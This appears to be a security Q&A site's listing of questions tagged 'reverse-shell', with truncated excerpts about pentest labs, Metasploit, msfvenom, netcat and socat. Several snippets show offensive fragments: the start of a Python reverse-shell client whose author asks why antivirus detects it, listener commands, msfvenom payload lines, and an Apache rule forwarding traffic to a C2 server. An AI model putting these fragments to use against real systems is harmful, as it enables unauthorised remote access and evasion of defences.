Questions tagged [reverse-shell]

49 questions
1 answer

Reverse shell with python client side becomes detectable after converting with pyinstaller as exe file

When converting the reverse shell python file to exe with pyinstaller it becomes detectable as a trojan on with most antivirus. Here is my client file: import os, socket, subprocess s = socket.socket() host =…
1 answer

Meterpreter Session died [Bwapp]

I just set up a lab with bwapp and wanted to jump straight into webshell. I used Unrestricted file upload vuln --> uploaded my perfect shell created with msfvenom. My only problem is that my session doesn't seem persistent as I'm getting Meterpreter…
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Help Understanding PHP Reverse Shells

I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches. For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I used…
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2 answers

Getting an Interactive Powershell Reverse Shell Using socat

I've read that socat is capable of creating interactive shells. I'd like to create an interactive Powershell shell. Kali Listener # socat - tcp4-listen:1338 Windows (socat.exe used from here:…
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I set up a successful reverse shell but my commands return nothing

I recently successfully uploaded an msfvenom binary payload into a Windows server 2008 VM. My netcat listener displays the following message: connect to [lhost ip] from (UNKNOWN) [rhost ip] 49155 which means it is connected. But when I run…
0 answers

Spawned reverse shell will not run additional commands

I am new to this, so I applogise if this is a silly question! I have created a reverse shell on a Windows box using an exploit script and the following MSFVENOM to create a reverse shell. msfvenom -a x86 --platform Windows -p…
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Why is a bind shell sometimes blocked when a reverse shell is not?

I understood the difference between them. The problem is I am not sure when to use each. I mean, if a firewall will block my connection to the target when I use bind shell, why the connection will not be blocked, when I send the payload again…
2 answers

Metasploit multi handler reverse tcp connection

Can we listen for 10 connections at once using any options present in Metasploit.
Solo Trench
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Where does meterpreter initially land in RAM?

When I exploit a service with Metasploit and expect a meterpreter reverse shell, where is my meterpreter session located on the target machine? Is it within the allocated memory of the exploited service?
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Netcat reverse shell, can't execute commands

I have used a stageless payload to gain a reverse shell using netcat. I get connection but the commands return nothing. I was wondering, why this happens? And how to fix this? The victim machine is a Windows 10 machine and I am using the correct…
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Reverse Shell using Weevely3

I'm trying to reverse shell using module backdoor_reversetcp backdoor_reversetcp 4444 - Connecting to my Machine nc -lnvp 4444 - Waiting Shell Weevely run 8 vector netcat_bsd,netcat,python,devtcp,perl,ruby,telnet,python_pty, so, running…
0 answers

I cannot make a reverse connection

I am playing with a Linux CTF server and came across a kind of reverse connection block. I uploaded a php webshell, gained control of www-data user and tried to make a reverse shell. Possible a UFW block at 1024~UP ports. In this server, I have SSH,…
0 answers

Chain apache web server acting like reverse proxys using proxychains

I've configure multiple apache web servers so they filter the request and if they have a specific request_uri the request would be redirect to a c2 server. I do that with the next line in the apache conf files ProxyPassMatch "^/thisisthepath$"…
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Meterpreter shell re-enter previous/next command

After a Meterpreter session has been established, you can start an interactive shell on the target host using the shell command. In the shell, I'm trying to switch between previously entered commands using the up/down keys. However, the up-key gets…
0 answers

Is it possible to reverse the connection of a client connected to a Google Meeting?

I was watching some videos of Jim Browning on Youtube and I have noticed that he reverses the connection of the scammer and gets remote access to their devices. So I was wondering about the risks that one innocent person like me could run into by…
John Harris
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